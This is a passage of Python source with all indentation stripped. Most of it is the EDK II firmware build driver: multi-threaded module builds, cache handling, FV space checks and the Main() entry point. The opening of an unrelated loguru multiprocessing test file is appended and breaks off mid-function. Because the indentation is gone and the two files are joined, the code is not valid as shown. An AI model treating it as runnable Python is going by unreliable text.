Ma.CreateMakeFile(True, CmdListDict[Module.Path, Arch])
del CmdListDict[Module.Path, Arch]
else:
Ma.CreateMakeFile(True)
self.Progress.Stop("done!")
if self.Target == "genmake":
return True
if GlobalData.gBinCacheSource and self.Target in [None, "", "all"]:
if Ma.CanSkipbyMakeCache():
continue
else:
self.MakeCacheMiss.add(Ma)
self.BuildModules.append(Ma)
self.AutoGenTime += int(round((time.time() - AutoGenStart)))
MakeStart = time.time()
for Ma in self.BuildModules:
if not Ma.IsBinaryModule:
Bt = BuildTask.New(ModuleMakeUnit(Ma, Pa.BuildCommand,self.Target))
# Break build if any build thread has error
if BuildTask.HasError():
# we need a full version of makefile for platform
ExitFlag.set()
BuildTask.WaitForComplete()
Pa.CreateMakeFile(False)
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Start task scheduler
if not BuildTask.IsOnGoing():
BuildTask.StartScheduler(self.ThreadNumber, ExitFlag)
# in case there's an interruption. we need a full version of makefile for platform
Pa.CreateMakeFile(False)
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
self.MakeTime += int(round((time.time() - MakeStart)))
MakeContiue = time.time()
ExitFlag.set()
BuildTask.WaitForComplete()
self.CreateAsBuiltInf()
if GlobalData.gBinCacheDest:
self.GenDestCache()
elif GlobalData.gUseHashCache and not GlobalData.gBinCacheSource:
# Only for --hash
# Update PreMakeCacheChain files
self.GenLocalPreMakeCache()
self.BuildModules = []
self.MakeTime += int(round((time.time() - MakeContiue)))
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
self.BuildReport.AddPlatformReport(Wa, MaList)
if MaList == []:
EdkLogger.error(
'build',
BUILD_ERROR,
"Module for [%s] is not a component of active platform."\
" Please make sure that the ARCH and inf file path are"\
" given in the same as in [%s]" % \
(', '.join(Wa.ArchList), self.PlatformFile),
ExtraData=self.ModuleFile
)
# Create MAP file when Load Fix Address is enabled.
if self.Target == "fds" and self.Fdf:
for Arch in Wa.ArchList:
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platorm with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma is None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
MapBuffer = []
if self.LoadFixAddress != 0:
#
# Rebase module to the preferred memory address before GenFds
#
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
#
# create FDS again for the updated EFI image
#
GenFdsStart = time.time()
self._Build("fds", Wa)
self.GenFdsTime += int(round((time.time() - GenFdsStart)))
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile (MapBuffer, Wa)
def _GenFfsCmd(self,ArchList):
# convert dictionary of Cmd:(Inf,Arch)
# to a new dictionary of (Inf,Arch):Cmd,Cmd,Cmd...
CmdSetDict = defaultdict(set)
GenFfsDict = GenFds.GenFfsMakefile('', GlobalData.gFdfParser, self, ArchList, GlobalData)
for Cmd in GenFfsDict:
tmpInf, tmpArch = GenFfsDict[Cmd]
CmdSetDict[tmpInf, tmpArch].add(Cmd)
return CmdSetDict
def VerifyAutoGenFiles(self):
AutoGenIdFile = os.path.join(GlobalData.gConfDirectory,".AutoGenIdFile.txt")
try:
with open(AutoGenIdFile) as fd:
lines = fd.readlines()
except:
return None
for line in lines:
if "Arch" in line:
ArchList = line.strip().split("=")[1].split("|")
if "BuildDir" in line:
BuildDir = line.split("=")[1].strip()
if "PlatformGuid" in line:
PlatformGuid = line.split("=")[1].strip()
GlobalVarList = []
for arch in ArchList:
global_var = os.path.join(BuildDir, "GlobalVar_%s_%s.bin" % (str(PlatformGuid),arch))
if not os.path.exists(global_var):
return None
GlobalVarList.append(global_var)
for global_var in GlobalVarList:
data_pipe = MemoryDataPipe()
data_pipe.load(global_var)
target = data_pipe.Get("P_Info").get("Target")
toolchain = data_pipe.Get("P_Info").get("ToolChain")
archlist = data_pipe.Get("P_Info").get("ArchList")
Arch = data_pipe.Get("P_Info").get("Arch")
active_p = data_pipe.Get("P_Info").get("ActivePlatform")
workspacedir = data_pipe.Get("P_Info").get("WorkspaceDir")
PackagesPath = os.getenv("PACKAGES_PATH")
mws.setWs(workspacedir, PackagesPath)
LibraryBuildDirectoryList = data_pipe.Get("LibraryBuildDirectoryList")
ModuleBuildDirectoryList = data_pipe.Get("ModuleBuildDirectoryList")
for m_build_dir in LibraryBuildDirectoryList:
if not os.path.exists(os.path.join(m_build_dir,self.MakeFileName)):
return None
for m_build_dir in ModuleBuildDirectoryList:
if not os.path.exists(os.path.join(m_build_dir,self.MakeFileName)):
return None
Wa = WorkSpaceInfo(
workspacedir,active_p,target,toolchain,archlist
)
Pa = PlatformInfo(Wa, active_p, target, toolchain, Arch,data_pipe)
Wa.AutoGenObjectList.append(Pa)
return Wa
def SetupMakeSetting(self,Wa):
BuildModules = []
for Pa in Wa.AutoGenObjectList:
for m in Pa._MbList:
ma = ModuleAutoGen(Wa,m.MetaFile, Pa.BuildTarget, Wa.ToolChain, Pa.Arch, Pa.MetaFile,Pa.DataPipe)
BuildModules.append(ma)
fdf_file = Wa.FlashDefinition
if fdf_file:
Fdf = FdfParser(fdf_file.Path)
Fdf.ParseFile()
GlobalData.gFdfParser = Fdf
if Fdf.CurrentFdName and Fdf.CurrentFdName in Fdf.Profile.FdDict:
FdDict = Fdf.Profile.FdDict[Fdf.CurrentFdName]
for FdRegion in FdDict.RegionList:
if str(FdRegion.RegionType) == 'FILE' and self.Platform.VpdToolGuid in str(FdRegion.RegionDataList):
if int(FdRegion.Offset) % 8 != 0:
EdkLogger.error("build", FORMAT_INVALID, 'The VPD Base Address %s must be 8-byte aligned.' % (FdRegion.Offset))
Wa.FdfProfile = Fdf.Profile
self.Fdf = Fdf
else:
self.Fdf = None
return BuildModules
## Build a platform in multi-thread mode
#
def PerformAutoGen(self,BuildTarget,ToolChain):
WorkspaceAutoGenTime = time.time()
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
self.BuildReport.AddPlatformReport(Wa)
Wa.CreateMakeFile(False)
# Add ffs build to makefile
CmdListDict = {}
if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
CmdListDict = self._GenFfsCmd(Wa.ArchList)
self.AutoGenTime += int(round((time.time() - WorkspaceAutoGenTime)))
BuildModules = []
for Arch in Wa.ArchList:
PcdMaList = []
AutoGenStart = time.time()
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
if Pa is None:
continue
ModuleList = []
for Inf in Pa.Platform.Modules:
ModuleList.append(Inf)
# Add the INF only list in FDF
if GlobalData.gFdfParser is not None:
for InfName in GlobalData.gFdfParser.Profile.InfList:
Inf = PathClass(NormPath(InfName), self.WorkspaceDir, Arch)
if Inf in Pa.Platform.Modules:
continue
ModuleList.append(Inf)
Pa.DataPipe.DataContainer = {"FfsCommand":CmdListDict}
Pa.DataPipe.DataContainer = {"Workspace_timestamp": Wa._SrcTimeStamp}
Pa.DataPipe.DataContainer = {"CommandTarget": self.Target}
Pa.CreateLibModuelDirs()
# Fetch the MakeFileName.
self.MakeFileName = Pa.MakeFileName
Pa.DataPipe.DataContainer = {"LibraryBuildDirectoryList":Pa.LibraryBuildDirectoryList}
Pa.DataPipe.DataContainer = {"ModuleBuildDirectoryList":Pa.ModuleBuildDirectoryList}
Pa.DataPipe.DataContainer = {"FdsCommandDict": Wa.GenFdsCommandDict}
# Prepare the cache share data for multiprocessing
Pa.DataPipe.DataContainer = {"gPlatformHashFile":GlobalData.gPlatformHashFile}
ModuleCodaFile = {}
for ma in Pa.ModuleAutoGenList:
ModuleCodaFile[(ma.MetaFile.File,ma.MetaFile.Root,ma.Arch,ma.MetaFile.Path)] = [item.Target for item in ma.CodaTargetList]
Pa.DataPipe.DataContainer = {"ModuleCodaFile":ModuleCodaFile}
# ModuleList contains all driver modules only
for Module in ModuleList:
# Get ModuleAutoGen object to generate C code file and makefile
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile,Pa.DataPipe)
if Ma is None:
continue
if Ma.PcdIsDriver:
Ma.PlatformInfo = Pa
Ma.Workspace = Wa
PcdMaList.append(Ma)
self.AllDrivers.add(Ma)
self.AllModules.add(Ma)
mqueue = mp.Queue()
cqueue = mp.Queue()
for m in Pa.GetAllModuleInfo:
mqueue.put(m)
module_file,module_root,module_path,module_basename,\
module_originalpath,module_arch,IsLib = m
Ma = ModuleAutoGen(Wa, PathClass(module_path, Wa), BuildTarget,\
ToolChain, Arch, self.PlatformFile,Pa.DataPipe)
self.AllModules.add(Ma)
data_pipe_file = os.path.join(Pa.BuildDir, "GlobalVar_%s_%s.bin" % (str(Pa.Guid),Pa.Arch))
Pa.DataPipe.dump(data_pipe_file)
mqueue.put((None,None,None,None,None,None,None))
autogen_rt, errorcode = self.StartAutoGen(mqueue, Pa.DataPipe, self.SkipAutoGen, PcdMaList, cqueue)
if not autogen_rt:
self.AutoGenMgr.TerminateWorkers()
self.AutoGenMgr.join(1)
raise FatalError(errorcode)
if GlobalData.gUseHashCache:
for item in GlobalData.gModuleAllCacheStatus:
(MetaFilePath, Arch, CacheStr, Status) = item
Ma = ModuleAutoGen(Wa, PathClass(MetaFilePath, Wa), BuildTarget,\
ToolChain, Arch, self.PlatformFile,Pa.DataPipe)
if CacheStr == "PreMakeCache" and Status == False:
self.PreMakeCacheMiss.add(Ma)
if CacheStr == "PreMakeCache" and Status == True:
self.PreMakeCacheHit.add(Ma)
GlobalData.gModuleCacheHit.add(Ma)
if CacheStr == "MakeCache" and Status == False:
self.MakeCacheMiss.add(Ma)
if CacheStr == "MakeCache" and Status == True:
self.MakeCacheHit.add(Ma)
GlobalData.gModuleCacheHit.add(Ma)
self.AutoGenTime += int(round((time.time() - AutoGenStart)))
AutoGenIdFile = os.path.join(GlobalData.gConfDirectory,".AutoGenIdFile.txt")
with open(AutoGenIdFile,"w") as fw:
fw.write("Arch=%s\n" % "|".join((Wa.ArchList)))
fw.write("BuildDir=%s\n" % Wa.BuildDir)
fw.write("PlatformGuid=%s\n" % str(Wa.AutoGenObjectList[0].Guid))
if GlobalData.gBinCacheSource:
BuildModules.extend(self.MakeCacheMiss)
elif GlobalData.gUseHashCache and not GlobalData.gBinCacheDest:
BuildModules.extend(self.PreMakeCacheMiss)
else:
BuildModules.extend(self.AllDrivers)
self.Progress.Stop("done!")
return Wa, BuildModules
def _MultiThreadBuildPlatform(self):
SaveFileOnChange(self.PlatformBuildPath, '# DO NOT EDIT \n# FILE auto-generated\n', False)
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
index = 0
for ToolChain in self.ToolChainList:
resetFdsGlobalVariable()
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
index += 1
ExitFlag = threading.Event()
ExitFlag.clear()
if self.SkipAutoGen:
Wa = self.VerifyAutoGenFiles()
if Wa is None:
self.SkipAutoGen = False
Wa, self.BuildModules = self.PerformAutoGen(BuildTarget,ToolChain)
else:
GlobalData.gAutoGenPhase = True
self.BuildModules = self.SetupMakeSetting(Wa)
else:
Wa, self.BuildModules = self.PerformAutoGen(BuildTarget,ToolChain)
Pa = Wa.AutoGenObjectList[0]
GlobalData.gAutoGenPhase = False
if GlobalData.gBinCacheSource:
EdkLogger.quiet("[cache Summary]: Total module num: %s" % len(self.AllModules))
EdkLogger.quiet("[cache Summary]: PreMakecache miss num: %s " % len(self.PreMakeCacheMiss))
EdkLogger.quiet("[cache Summary]: Makecache miss num: %s " % len(self.MakeCacheMiss))
for Arch in Wa.ArchList:
MakeStart = time.time()
for Ma in set(self.BuildModules):
# Generate build task for the module
if not Ma.IsBinaryModule:
Bt = BuildTask.New(ModuleMakeUnit(Ma, Pa.BuildCommand,self.Target))
# Break build if any build thread has error
if BuildTask.HasError():
# we need a full version of makefile for platform
ExitFlag.set()
BuildTask.WaitForComplete()
Pa.CreateMakeFile(False)
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Start task scheduler
if not BuildTask.IsOnGoing():
BuildTask.StartScheduler(self.ThreadNumber, ExitFlag)
# in case there's an interruption. we need a full version of makefile for platform
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
self.MakeTime += int(round((time.time() - MakeStart)))
MakeContiue = time.time()
#
#
# All modules have been put in build tasks queue. Tell task scheduler
# to exit if all tasks are completed
#
ExitFlag.set()
BuildTask.WaitForComplete()
if GlobalData.gBinCacheDest:
self.GenDestCache()
elif GlobalData.gUseHashCache and not GlobalData.gBinCacheSource:
# Only for --hash
# Update PreMakeCacheChain files
self.GenLocalPreMakeCache()
#
# Get Module List
#
ModuleList = {ma.Guid.upper(): ma for ma in self.BuildModules}
self.BuildModules = []
self.MakeTime += int(round((time.time() - MakeContiue)))
#
# Check for build error, and raise exception if one
# has been signaled.
#
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Create MAP file when Load Fix Address is enabled.
if self.Target in ["", "all", "fds"]:
for Arch in Wa.ArchList:
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platorm with IA32 or ARM arch modules")
#
# Rebase module to the preferred memory address before GenFds
#
MapBuffer = []
if self.LoadFixAddress != 0:
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
if self.Fdf:
#
# Generate FD image if there's a FDF file found
#
GenFdsStart = time.time()
if GenFdsApi(Wa.GenFdsCommandDict, self.Db):
EdkLogger.error("build", COMMAND_FAILURE)
Threshold = self.GetFreeSizeThreshold()
if Threshold:
self.CheckFreeSizeThreshold(Threshold, Wa.FvDir)
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
self.GenFdsTime += int(round((time.time() - GenFdsStart)))
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile(MapBuffer, Wa)
self.CreateGuidedSectionToolsFile(Wa)
## GetFreeSizeThreshold()
#
# @retval int Threshold value
#
def GetFreeSizeThreshold(self):
Threshold = None
Threshold_Str = GlobalData.gCommandLineDefines.get('FV_SPARE_SPACE_THRESHOLD')
if Threshold_Str:
try:
if Threshold_Str.lower().startswith('0x'):
Threshold = int(Threshold_Str, 16)
else:
Threshold = int(Threshold_Str)
except:
EdkLogger.warn("build", 'incorrect value for FV_SPARE_SPACE_THRESHOLD %s.Only decimal or hex format is allowed.' % Threshold_Str)
return Threshold
def CheckFreeSizeThreshold(self, Threshold=None, FvDir=None):
if not isinstance(Threshold, int):
return
if not isinstance(FvDir, str) or not FvDir:
return
FdfParserObject = GlobalData.gFdfParser
FvRegionNameList = [FvName for FvName in FdfParserObject.Profile.FvDict if FdfParserObject.Profile.FvDict[FvName].FvRegionInFD]
for FvName in FdfParserObject.Profile.FvDict:
if FvName in FvRegionNameList:
FvSpaceInfoFileName = os.path.join(FvDir, FvName.upper() + '.Fv.map')
if os.path.exists(FvSpaceInfoFileName):
FileLinesList = getlines(FvSpaceInfoFileName)
for Line in FileLinesList:
NameValue = Line.split('=')
if len(NameValue) == 2 and NameValue[0].strip() == 'EFI_FV_SPACE_SIZE':
FreeSizeValue = int(NameValue[1].strip(), 0)
if FreeSizeValue < Threshold:
EdkLogger.error("build", FV_FREESIZE_ERROR,
'%s FV free space %d is not enough to meet with the required spare space %d set by -D FV_SPARE_SPACE_THRESHOLD option.' % (
FvName, FreeSizeValue, Threshold))
break
## Generate GuidedSectionTools.txt in the FV directories.
#
def CreateGuidedSectionToolsFile(self,Wa):
for BuildTarget in self.BuildTargetList:
for ToolChain in self.ToolChainList:
FvDir = Wa.FvDir
if not os.path.exists(FvDir):
continue
for Arch in self.ArchList:
guidList = []
tooldefguidList = []
guidAttribs = []
for Platform in Wa.AutoGenObjectList:
if Platform.BuildTarget != BuildTarget:
continue
if Platform.ToolChain != ToolChain:
continue
if Platform.Arch != Arch:
continue
if hasattr (Platform, 'BuildOption'):
for Tool in Platform.BuildOption:
if 'GUID' in Platform.BuildOption[Tool]:
if 'PATH' in Platform.BuildOption[Tool]:
value = Platform.BuildOption[Tool]['GUID']
if value in guidList:
EdkLogger.error("build", FORMAT_INVALID, "Duplicate GUID value %s used with Tool %s in DSC [BuildOptions]." % (value, Tool))
path = Platform.BuildOption[Tool]['PATH']
guidList.append(value)
guidAttribs.append((value, Tool, path))
for Tool in Platform.ToolDefinition:
if 'GUID' in Platform.ToolDefinition[Tool]:
if 'PATH' in Platform.ToolDefinition[Tool]:
value = Platform.ToolDefinition[Tool]['GUID']
if value in tooldefguidList:
EdkLogger.error("build", FORMAT_INVALID, "Duplicate GUID value %s used with Tool %s in tools_def.txt." % (value, Tool))
tooldefguidList.append(value)
if value in guidList:
# Already added by platform
continue
path = Platform.ToolDefinition[Tool]['PATH']
guidList.append(value)
guidAttribs.append((value, Tool, path))
# Sort by GuidTool name
guidAttribs = sorted (guidAttribs, key=lambda x: x[1])
# Write out GuidedSecTools.txt
toolsFile = os.path.join(FvDir, 'GuidedSectionTools.txt')
toolsFile = open(toolsFile, 'wt')
for guidedSectionTool in guidAttribs:
print(' '.join(guidedSectionTool), file=toolsFile)
toolsFile.close()
## Returns the real path of the tool.
#
def GetRealPathOfTool (self, tool):
if os.path.exists(tool):
return os.path.realpath(tool)
return tool
## Launch the module or platform build
#
def Launch(self):
self.AllDrivers = set()
self.AllModules = set()
self.PreMakeCacheMiss = set()
self.PreMakeCacheHit = set()
self.MakeCacheMiss = set()
self.MakeCacheHit = set()
if not self.ModuleFile:
if not self.SpawnMode or self.Target not in ["", "all"]:
self.SpawnMode = False
self._BuildPlatform()
else:
self._MultiThreadBuildPlatform()
else:
self.SpawnMode = False
self._BuildModule()
if self.Target == 'cleanall':
RemoveDirectory(os.path.dirname(GlobalData.gDatabasePath), True)
def CreateAsBuiltInf(self):
for Module in self.BuildModules:
Module.CreateAsBuiltInf()
def GenDestCache(self):
for Module in self.AllModules:
Module.GenPreMakefileHashList()
Module.GenMakefileHashList()
Module.CopyModuleToCache()
def GenLocalPreMakeCache(self):
for Module in self.PreMakeCacheMiss:
Module.GenPreMakefileHashList()
## Do some clean-up works when error occurred
def Relinquish(self):
OldLogLevel = EdkLogger.GetLevel()
EdkLogger.SetLevel(EdkLogger.ERROR)
Utils.Progressor.Abort()
if self.SpawnMode == True:
BuildTask.Abort()
EdkLogger.SetLevel(OldLogLevel)
def ParseDefines(DefineList=[]):
DefineDict = {}
if DefineList is not None:
for Define in DefineList:
DefineTokenList = Define.split("=", 1)
if not GlobalData.gMacroNamePattern.match(DefineTokenList[0]):
EdkLogger.error('build', FORMAT_INVALID,
"The macro name must be in the pattern [A-Z][A-Z0-9_]*",
ExtraData=DefineTokenList[0])
if len(DefineTokenList) == 1:
DefineDict[DefineTokenList[0]] = "TRUE"
else:
DefineDict[DefineTokenList[0]] = DefineTokenList[1].strip()
return DefineDict
def LogBuildTime(Time):
if Time:
TimeDurStr = ''
TimeDur = time.gmtime(Time)
if TimeDur.tm_yday > 1:
TimeDurStr = time.strftime("%H:%M:%S", TimeDur) + ", %d day(s)" % (TimeDur.tm_yday - 1)
else:
TimeDurStr = time.strftime("%H:%M:%S", TimeDur)
return TimeDurStr
else:
return None
def ThreadNum():
OptionParser = MyOptionParser()
if not OptionParser.BuildOption and not OptionParser.BuildTarget:
OptionParser.GetOption()
BuildOption, BuildTarget = OptionParser.BuildOption, OptionParser.BuildTarget
ThreadNumber = BuildOption.ThreadNumber
GlobalData.gCmdConfDir = BuildOption.ConfDirectory
if ThreadNumber is None:
TargetObj = TargetTxtDict()
ThreadNumber = TargetObj.Target.TargetTxtDictionary[TAB_TAT_DEFINES_MAX_CONCURRENT_THREAD_NUMBER]
if ThreadNumber == '':
ThreadNumber = 0
else:
ThreadNumber = int(ThreadNumber, 0)
if ThreadNumber == 0:
try:
ThreadNumber = multiprocessing.cpu_count()
except (ImportError, NotImplementedError):
ThreadNumber = 1
return ThreadNumber
## Tool entrance method
#
# This method mainly dispatch specific methods per the command line options.
# If no error found, return zero value so the caller of this tool can know
# if it's executed successfully or not.
#
# @retval 0 Tool was successful
# @retval 1 Tool failed
#
LogQMaxSize = ThreadNum() * 10
def Main():
StartTime = time.time()
#
# Create a log Queue
#
LogQ = mp.Queue(LogQMaxSize)
# Initialize log system
EdkLogger.LogClientInitialize(LogQ)
GlobalData.gCommand = sys.argv[1:]
#
# Parse the options and args
#
OptionParser = MyOptionParser()
if not OptionParser.BuildOption and not OptionParser.BuildTarget:
OptionParser.GetOption()
Option, Target = OptionParser.BuildOption, OptionParser.BuildTarget
GlobalData.gOptions = Option
GlobalData.gCaseInsensitive = Option.CaseInsensitive
# Set log level
LogLevel = EdkLogger.INFO
if Option.verbose is not None:
EdkLogger.SetLevel(EdkLogger.VERBOSE)
LogLevel = EdkLogger.VERBOSE
elif Option.quiet is not None:
EdkLogger.SetLevel(EdkLogger.QUIET)
LogLevel = EdkLogger.QUIET
elif Option.debug is not None:
EdkLogger.SetLevel(Option.debug + 1)
LogLevel = Option.debug + 1
else:
EdkLogger.SetLevel(EdkLogger.INFO)
if Option.WarningAsError == True:
EdkLogger.SetWarningAsError()
Log_Agent = LogAgent(LogQ,LogLevel,Option.LogFile)
Log_Agent.start()
if platform.platform().find("Windows") >= 0:
GlobalData.gIsWindows = True
else:
GlobalData.gIsWindows = False
EdkLogger.quiet("Build environment: %s" % platform.platform())
EdkLogger.quiet(time.strftime("Build start time: %H:%M:%S, %b.%d %Y\n", time.localtime()));
ReturnCode = 0
MyBuild = None
BuildError = True
try:
if len(Target) == 0:
Target = "all"
elif len(Target) >= 2:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "More than one targets are not supported.",
ExtraData="Please select one of: %s" % (' '.join(gSupportedTarget)))
else:
Target = Target[0].lower()
if Target not in gSupportedTarget:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "Not supported target [%s]." % Target,
ExtraData="Please select one of: %s" % (' '.join(gSupportedTarget)))
#
# Check environment variable: EDK_TOOLS_PATH, WORKSPACE, PATH
#
CheckEnvVariable()
GlobalData.gCommandLineDefines.update(ParseDefines(Option.Macros))
Workspace = os.getenv("WORKSPACE")
#
# Get files real name in workspace dir
#
GlobalData.gAllFiles = Utils.DirCache(Workspace)
WorkingDirectory = os.getcwd()
if not Option.ModuleFile:
FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.inf')))
FileNum = len(FileList)
if FileNum >= 2:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "There are %d INF files in %s." % (FileNum, WorkingDirectory),
ExtraData="Please use '-m <INF_FILE_PATH>' switch to choose one.")
elif FileNum == 1:
Option.ModuleFile = NormFile(FileList[0], Workspace)
if Option.ModuleFile:
if os.path.isabs (Option.ModuleFile):
if os.path.normcase (os.path.normpath(Option.ModuleFile)).find (Workspace) == 0:
Option.ModuleFile = NormFile(os.path.normpath(Option.ModuleFile), Workspace)
Option.ModuleFile = PathClass(Option.ModuleFile, Workspace)
ErrorCode, ErrorInfo = Option.ModuleFile.Validate(".inf", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if Option.PlatformFile is not None:
if os.path.isabs (Option.PlatformFile):
if os.path.normcase (os.path.normpath(Option.PlatformFile)).find (Workspace) == 0:
Option.PlatformFile = NormFile(os.path.normpath(Option.PlatformFile), Workspace)
Option.PlatformFile = PathClass(Option.PlatformFile, Workspace)
if Option.FdfFile is not None:
if os.path.isabs (Option.FdfFile):
if os.path.normcase (os.path.normpath(Option.FdfFile)).find (Workspace) == 0:
Option.FdfFile = NormFile(os.path.normpath(Option.FdfFile), Workspace)
Option.FdfFile = PathClass(Option.FdfFile, Workspace)
ErrorCode, ErrorInfo = Option.FdfFile.Validate(".fdf", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if Option.Flag is not None and Option.Flag not in ['-c', '-s']:
EdkLogger.error("build", OPTION_VALUE_INVALID, "UNI flag must be one of -c or -s")
MyBuild = Build(Target, Workspace, Option,LogQ)
GlobalData.gCommandLineDefines['ARCH'] = ' '.join(MyBuild.ArchList)
if not (MyBuild.LaunchPrebuildFlag and os.path.exists(MyBuild.PlatformBuildPath)):
MyBuild.Launch()
#
# All job done, no error found and no exception raised
#
BuildError = False
except FatalError as X:
if MyBuild is not None:
# for multi-thread build exits safely
MyBuild.Relinquish()
if Option is not None and Option.debug is not None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
ReturnCode = X.args[0]
except Warning as X:
# error from Fdf parser
if MyBuild is not None:
# for multi-thread build exits safely
MyBuild.Relinquish()
if Option is not None and Option.debug is not None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
else:
EdkLogger.error(X.ToolName, FORMAT_INVALID, File=X.FileName, Line=X.LineNumber, ExtraData=X.Message, RaiseError=False)
ReturnCode = FORMAT_INVALID
except KeyboardInterrupt:
if MyBuild is not None:
# for multi-thread build exits safely
MyBuild.Relinquish()
ReturnCode = ABORT_ERROR
if Option is not None and Option.debug is not None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
except:
if MyBuild is not None:
# for multi-thread build exits safely
MyBuild.Relinquish()
# try to get the meta-file from the object causing exception
Tb = sys.exc_info()[-1]
MetaFile = GlobalData.gProcessingFile
while Tb is not None:
if 'self' in Tb.tb_frame.f_locals and hasattr(Tb.tb_frame.f_locals['self'], 'MetaFile'):
MetaFile = Tb.tb_frame.f_locals['self'].MetaFile
Tb = Tb.tb_next
EdkLogger.error(
"\nbuild",
CODE_ERROR,
"Unknown fatal error when processing [%s]" % MetaFile,
ExtraData="\n(Please send email to %s for help, attaching following call stack trace!)\n" % MSG_EDKII_MAIL_ADDR,
RaiseError=False
)
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
ReturnCode = CODE_ERROR
finally:
Utils.Progressor.Abort()
Utils.ClearDuplicatedInf()
if ReturnCode == 0:
try:
MyBuild.LaunchPostbuild()
Conclusion = "Done"
except:
Conclusion = "Failed"
ReturnCode = POSTBUILD_ERROR
elif ReturnCode == ABORT_ERROR:
Conclusion = "Aborted"
else:
Conclusion = "Failed"
FinishTime = time.time()
BuildDuration = time.gmtime(int(round(FinishTime - StartTime)))
BuildDurationStr = ""
if BuildDuration.tm_yday > 1:
BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration) + ", %d day(s)" % (BuildDuration.tm_yday - 1)
else:
BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration)
if MyBuild is not None:
if not BuildError:
MyBuild.BuildReport.GenerateReport(BuildDurationStr, LogBuildTime(MyBuild.AutoGenTime), LogBuildTime(MyBuild.MakeTime), LogBuildTime(MyBuild.GenFdsTime))
EdkLogger.SetLevel(EdkLogger.QUIET)
EdkLogger.quiet("\n- %s -" % Conclusion)
EdkLogger.quiet(time.strftime("Build end time: %H:%M:%S, %b.%d %Y", time.localtime()))
EdkLogger.quiet("Build total time: %s\n" % BuildDurationStr)
Log_Agent.kill()
Log_Agent.join()
return ReturnCode
if __name__ == '__main__':
try:
mp.set_start_method('spawn')
except:
pass
r = Main()
## 0-127 is a safe return range, and 1 is a standard default error
if r < 0 or r > 127: r = 1
sys.exit(r)
|
test_multiprocessing.py | import os
import sys
import multiprocessing
import loguru
from loguru import logger
import time
import pytest
def do_something(i):
logger.info("#{}", i)
def set_logger(logger_):
global logger
logger = logger_
def subworker(logger_):
logger_.info("Child")
def subworker_inheritance():
logger.info("Child")
def subworker_remove(logger_):
logger_.info("Child")
logger_.remove()
logger_.info("Nope")
def subworker_remove_inheritance():
logger.info("Child")
logger.remove()
logger.info("Nope")
def subworker_barrier(logger_, barrier):
logger_.info("Child")
barrier.wait()
time.sleep(0.5)
logger_.info("Nope")
def subworker_barrier_inheritance(barrier):
logger.info("Child")
barrier.wait()
time.sleep(0.5)
logger.info("Nope")
class Writer:
def __init__(self):
self._output = ""
def write(self, message):
self._output += message
def read(self):
return self._output
def test_apply_spawn(monkeypatch):
ctx = multiprocessing.get_context("spawn")
monkeypatch.setattr(loguru._handler, "multiprocessing", ctx)
writer = Writer()
logger.add(writer, format="{message}", enqueue=True)
